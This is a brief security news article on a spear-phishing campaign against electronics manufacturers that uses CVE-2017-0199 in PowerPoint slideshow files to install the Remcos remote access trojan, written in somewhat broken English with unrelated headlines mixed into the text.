Cyber criminals exploiting a vulnerability via PowerPoint

Malware

Cyber criminals using a vulnerability that delivers a malware via Microsoft PowerPoint. The flaw stored in the Windows Object Linking and Embedding (OLE) interface, used by attackers to distribute malicious Microsoft Office files.

The flaw commonly used to deliver infected .RTF documents, but Cyber security researchers spotted attackers using it to compromise PowerPoint slideshow files for the first time.

This attack begins with a spear-phishing email. Mainly the malware targets organizations in the electronics manufacturing industry. The dispatcher address look like an email from a business partner and it appears an order request, with an attachment allegedly containing shipping information.

Banking malware infects PC without a mouse click

However, the attachment containing a malicious PowerPoint, displays the text "CVE-2017-8570", a reference to a different Microsoft Office vulnerability than the one used in this attack.

CVE-2017-0199 vulnerability

The malicious file triggers an exploit for the CVE-2017-0199 vulnerability, which initializes the infection process. As a result, the malicious code run using the PowerPoint Show animation feature, which downloads a file logo document.

The downloaded logo.doc contains XML and JavaScript code, which runs PowerShell to execute a file called "RATMAN.EXE", a Trojan version of the Remcos remote access tool, which connects to a command and control server.

Fireball, a malware infected 250 million Windows and Mac devices

Remcos is capable of many criminal operations, with compromised machines at risk from keylogging, screen logging, webcam and microphone recorders, and the downloading and execution of additional malware. The additional malware can give the attacker full control over the infected machine.

This attack uses NET protector, includes several protections and actions to make it difficult for researchers to reverse engineer. Critically, most methods of detecting the CVE-2017-0199 malware focus on the RTF attack method. The use of the PPSX PowerPoint as an attack vector means attackers coded the malware to avoid antivirus detection.

Microsoft released patches to address the vulnerability in last April, and systems updated with these is safe from the attacks.